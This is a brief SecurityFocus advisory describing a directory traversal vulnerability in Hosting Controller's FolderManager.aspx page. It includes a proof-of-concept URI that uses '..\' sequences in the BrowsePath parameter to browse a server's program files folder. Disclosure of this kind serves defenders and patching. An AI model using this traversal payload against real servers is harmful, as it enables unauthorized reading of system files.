Hosting Controller FolderManager.ASPX Directory Traversal Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/FolderManager/FolderManager.aspx?BrowseLevel=1&BrowsePath=[SITE NORMAL PATH]\..\..\..\..\program%20files


 

Privacy Statement
Copyright 2010, SecurityFocus